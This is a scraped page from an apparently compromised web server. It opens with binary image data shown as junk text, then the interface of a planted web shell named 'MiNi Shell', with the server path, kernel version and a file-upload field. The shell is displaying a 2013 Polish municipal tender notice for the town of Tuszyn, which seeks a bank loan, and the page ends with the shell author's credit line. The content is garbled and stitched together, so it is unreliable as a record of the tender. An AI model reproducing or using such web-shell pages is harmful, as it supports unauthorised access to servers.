JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131014/415946-N-2013.html

<p class="kh_header"><b>Tuszyn: Zaciągnięcie długoterminowego kredytu bankowego w 2013r. do wysokości  1.008.038,00  zł ( słownie:   jeden milion osiem tysięcy trzydzieści osiem  zł ) na  spłatę wcześniej zaciągniętych kredytów i pożyczek</b><br>
<b>Numer ogłoszenia: 415946 - 2013; data zamieszczenia: 14.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuszyn , ul. Piotrkowska 2/4, 95-080 Tuszyn, woj. łódzkie, tel. 042 6143325, faks 042 6143069.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuszyn.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaciągnięcie długoterminowego kredytu bankowego w 2013r. do wysokości  1.008.038,00  zł ( słownie:   jeden milion osiem tysięcy trzydzieści osiem  zł ) na  spłatę wcześniej zaciągniętych kredytów i pożyczek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zaciągnięcie długoterminowego kredytu bankowego w 2013  r. do wysokości  1.008.038,00  zł ( słownie:
  jeden milion osiem tysięcy trzydzieści osiem zł ) na  spłatę wcześniej zaciągniętych kredytów i pożyczek. 
     
     a) Kod CPV  66 11 30 00 - 5   
     b) Planowany okres kredytowania - do dnia 20.12.2021 roku.
     c) Okres spłaty rat kredytu-kapitał - począwszy od  20 marca 2014  roku do 20 grudnia  2021 roku -                                          
         w  32 ratach kwartalnych, w tym: 
w roku 2014  - 4 raty kapitałowe po   12 500,00 zł   ( razem   50 000,00 zł ),
w roku 2015  - 4 raty kapitałowe po   12 500,00 zł   ( razem   50 000,00 zł ),
w roku 2016  - 4 raty kapitałowe po   12 500,00 zł   ( razem   50 000,00 zł ),
w roku 2017  - 4 raty kapitałowe ( 3 raty po 42 902,00 zł i 1 rata 42 901,00 zł ( razem 171 607,00 zł),
w roku 2018  - 4 raty kapitałowe ( 3 raty po 42 902,00 zł i 1 rata 42 901,00 zł ( razem 171 607,00 zł),
w roku 2019  - 4 raty kapitałowe ( 3 raty po 42 902,00 zł i 1 rata 42 901,00 zł ( razem 171 607,00 zł),
w roku 2020  - 4 raty kapitałowe ( 3 raty po 42.902,00 zł i 1 rata 42 901,00 zł ( razem 171 607,00 zł),
w roku 2021  - 4 raty kapitałowe ( 3 raty po 42 902,00 zł i 1 rata 42 904,00 zł ( razem 171 610,00 zł),

d) Okres karencji w spłacie kredytu do końca 2013  roku.
 e) Termin ostatecznego wykorzystania kredytu do 20 grudnia 2013  roku.                                                                 
 f)  Uruchomienie kredytu - jednorazowo  do 20 grudnia 2013 r. po podpisaniu umowy, z tym, że termin  
     wypłaty kredytu najpóźniej w ciągu 7 dni od chwili  wystąpienia przez Gminę o uruchomienie wypłaty w kwocie 
     określonej w złożonym zapotrzebowaniu.
     Kwota niewykorzystana przez Gminę do końca ostatecznego okresu wykorzystania kredytu, obniża kwotę kredytu i  
     odpowiednio zmienia harmonogram spłat rat kredytu.                                                                                                     
     2. Waluta - PLN                                                                                                                                              
     3. Oprocentowanie kredytu .
      Kredyt jest oprocentowany według zmiennej stopy procentowej według stawki oprocentowania dla depozytów  
      międzybankowych - WIBOR 1M- ustalonej dla pierwszego okresu kredytowania jako  średnia arytmetyczna 
      notowań z miesiąca  poprzedzającego dzień wypłaty kredytu, a dla kolejnych okresów odsetkowych
      obowiązuje stawka WIBOR 1M ustalona jako średnia arytmetyczna notowań z miesiąca poprzedzającego okres jej
      obowiązywania, z dokładnością do 2 miejsc po przecinku, powiększonej o stałą w  całym  okresie kredytowania 
      marżę Banku. Pierwszy  okres oprocentowania rozpoczyna się w pierwszym dniu uruchomienia kredytu i  kończy
      się ostatniego dnia miesiąca kalendarzowego. Każdy następny okres obowiązywania oprocentowania rozpoczyna 
      się w dniu następującym bezpośrednio po upływie poprzedniego okresu obowiązywania oprocentowania i            
      kończy  się w ostatnim dniu kalendarzowym kolejnego miesiąca.               
        Ostatni okres obowiązywania oprocentowania kończy się w dniu poprzedzającym dzień zakończenia okresu   
        kredytowania wskazanym w § 3 ust.1 .                                                                                                                                               
        Marża Banku nie ulegnie zmianie w całym okresie kredytowania.
                                                                                                                                                                                               
        4. Naliczanie i płatność odsetek.
      Odsetki  płatne miesięcznie w ostatnim dniu roboczym każdego miesiąca naliczania odsetek -  z wyłączeniem  
      pierwszego i ostatniego okresu naliczania odsetek. Pierwszy okres naliczania odsetek rozpoczyna się w pierwszym 
      dniu uruchomienia kredytu i kończy się w ostatnim dniu  miesiąca, w którym został uruchomiony kredyt. Każdy 
      następny okres naliczania odsetek rozpoczyna się 1-go dnia miesiąca a kończy się ostatniego  dnia tego miesiąca.  
      Ostatni okres naliczania odsetek kończy się w dniu poprzedzającym dzień zakończenia okresu kredytowania.  
      Odsetki będą naliczane tylko od kwoty faktycznego zadłużenia. Odsetki będą spłacane w ostatnim dniu roboczym   
      każdego miesiąca. Ostatnie odsetki płatne wraz z ostatnią ratą kredytu. Odsetki będą naliczane za rzeczywistą  
      liczbę dni wykorzystania kredytu, przy założeniu, że rok liczy 365-366 dni.

      5. Kredyt zostanie przelany na konto wskazane przez Zamawiającego jednorazowo.                                                                     
      Uruchomienie  wypłaty kredytu  nastąpi w  terminie  do 7 dni od daty wystąpienia przez Gminę z  
      pisemną dyspozycją uruchomienia wypłaty . W pisemnej dyspozycji  Gminy dotyczącej uruchomienia   
      środków z kredytu zostanie podana wysokość uruchamianych środków.
      Do oferty  należy przyjąć i traktować jedynie jako hipotetyczną jednorazową wypłatę środków z kredytu w  
      terminie 20 października 2013  r. oraz stawkę WIBOR 1M z  01.10.2013 r. tj. 2,60.

     6. Kredytobiorca zastrzega sobie prawo do wcześniejszej spłaty części kredytu bez ponoszenia z tego tytułu 
         żadnych dodatkowych kosztów.

    7. Dopuszcza się niewykorzystanie pełnej kwoty kredytu,  bez ponoszenia dodatkowych opłat ( bez prowizji za tzw.   
        gotowość lub opłat za aneks ), zmianę wysokości rat kapitałowych, skrócenie lub wydłużenie okresu kredytowania.
        Wykonawca zobowiązany jest do podpisania stosownego aneksu do umowy w  terminie 14 dni od daty otrzymania
        wniosku Zamawiającego o zmniejszenie kwoty kredytu,  zmianę wysokości rat  kapitałowych, skrócenie lub   
        wydłużenie okresu kredytowania.

    8. Ustanawia się zabezpieczenie kredytu w formie weksla in blanco wraz z deklaracją wekslową. Zamawiający nie   
        wyraża zgody na złożenie przez Skarbnika kontrasygnaty na wekslu in blanco .

    9. Marża oraz prowizja od przyznanego kredytu stanowią jedyne koszty obciążające Zamawiającego. Od  
        niespłaconego w terminie zadłużenia z tytułu zaciągniętego kredytu pobiera się odsetki w wysokości odsetek  
       ustawowych.

  10. Nie przewiduje się ustalenia innego dodatkowego zabezpieczenia kredytu.

  11. Odsetki będą liczone od kwoty kredytu wykorzystanego a nie postawionego do dyspozycji.

  12. W sytuacji wcześniejszej spłaty kredytu - odsetki będą liczone do dnia spłaty kredytu, a nie do końca umowy, bez 
        prowizji rekompensacyjnej.

  13. Skarbnik  Miasta złoży kontrasygnatę na umowie kredytowej.

  14. Prowizja banku będzie  obliczona od wypłaconej kwoty kredytu.                                                                              
        Prowizja płatna w dniu uruchomienia  kredytu z rachunku Urzędu Miasta Tuszyna -
 
        Bank PEKAO SA I O/Tuszyn  951240 3451 1111 0000 3031 6229

 15. W przypadku wejścia Polski do strefy euro kredyt zostanie przewalutowany bez dodatkowych opłat.

  16. Kredytobiorca zastrzega sobie prawo do  skrócenia lub wydłużenia okresu kredytowania oraz do zmiany  
        wysokości rat kapitałowych w okresie spłaty kredytu w zależności od kondycji finansowej gminy.
                                                                                                                                                                                              
       Zamiar dokonania zmian w harmonogramie powinien być zgłoszony Wykonawcy na piśmie najpóźniej do 
       ostatniego dnia kalendarzowego miesiąca poprzedzającego termin zapłaty raty, której zmiana dotyczy, a wszystkie 
       zmiany powinny być wprowadzone aneksem do umowy.

 17. Wykonawca zapłaci Zamawiającemu :
      1) odsetki za zwłokę w udzieleniu  kredytu - w wysokości  0,05% wartości transzy za każdy dzień  
          zwłoki.
      2) karę umowną  w wysokości 10%  sumy udzielonego kredytu za odstąpienie od umowy przez Wykonawcę z 
         przyczyn, za które Wykonawca ponosi odpowiedzialność.      

 18.  Zamawiający nie wyraża zgody na zastosowanie w umowie kredytowej następujących klauzul :
       1)  cross default - nie wykonanie lub nienależyte wykonanie zobowiązań wynikających z jakiejkolwiek umowy 
            zawartej z bankiem,
       2)  paris pass - zapewnienie, że wierzytelności banku w stosunku do klienta będą miały równe pierwszeństwo 
            w zaspokojeniu z wierzytelnościami innych podmiotów w stosunku do klienta z zastrzeżeniem przepisów      
            bezwzględnie obowiązującego prawa,
       3)  negative pleadge - zapewnienie, że bez uzyskania uprzedniej pisemnej zgody banku klient nie będzie  
            dokonywał jakichkolwiek obciążeń składników swojego majątku obecnego i przyszłego, a w szczególności   
            nie będzie dokonywał na tym majątku zabezpieczeń wierzytelności innych wierzycieli.
Wszystkie wymienione wyżej warunki stanowią istotne dla Zamawiającego postanowienia umowy i muszą się znaleźć w umowie, która zostanie zawarta z wybranym Wykonawcą..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2021.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poprzez przedstawienie zezwolenia Komisji Nadzoru Bankowego na wykonywanie działalności bankowej zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo Bankowe  lub dokumentów  równoważnych ( potwierdzających prawo do prowadzenia na terenie Polski działalności bankowej ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) poprzez przedstawienie przez Wykonawcę wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 jednostce budżetowej kredytu na kwotę o łącznej wartości minimum 1.000.000 PLN ( tj. 1 kredyt na kwotę min 1.000.000 PLN lub kilku kredytów, których suma daje kwotę 1.0000.000 PLN) z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że usługi zostały wykonane lub są wykonywane należycie - załącznik Nr 6 do SIWZ. W przypadku składania oferty wspólnej przez Wykonawców warunek ten może być spełniony wspólnie przez tych Wykonawców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za najważniejsze usługi  uważa się usługi niezbędne do wykazania warunku określonego w § 5 ust.1 pkt.2  
  SIWZ. Zamawiający nie wymaga informacji o usługach  niewykonanych lub wykonanych nienależycie.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  zastrzega sobie prawo zmiany umowy kredytowej w zakresie zmiany harmonogramu spłat, określonego w § 3 niniejszej SIWZ. Zamawiający zastrzega sobie możliwość zmniejszenia kwoty kredytu określonej w § 3, ust.1 SIWZ  oraz zmiany wysokości rat kapitałowych określonych w § 3, ust.1 pkt c)  SIWZ , a także skrócenia lub wydłużenia okresu kredytowania określonego w SIWZ - na wniosek Zamawiającego w drodze zmiany umowy. Wykonawca zobowiązuje się do podpisania stosownego aneksu do umowy w terminie 14 dni od daty otrzymania wniosku o zmniejszenie kwoty kredytu lub wniosku o zmianę wysokości rat kapitałowych lub wniosku o wydłużenie lub skrócenie okresu kredytowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuszyn.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Tuszynie
ul. Piotrkowska 2/4
95-080 Tuszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2013 godzina 11:30, miejsce: Urząd Miasta w Tuszynie
ul. Piotrkowska 2/4
95-080 Tuszyn
( sekretariat - pok. nr 1 ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com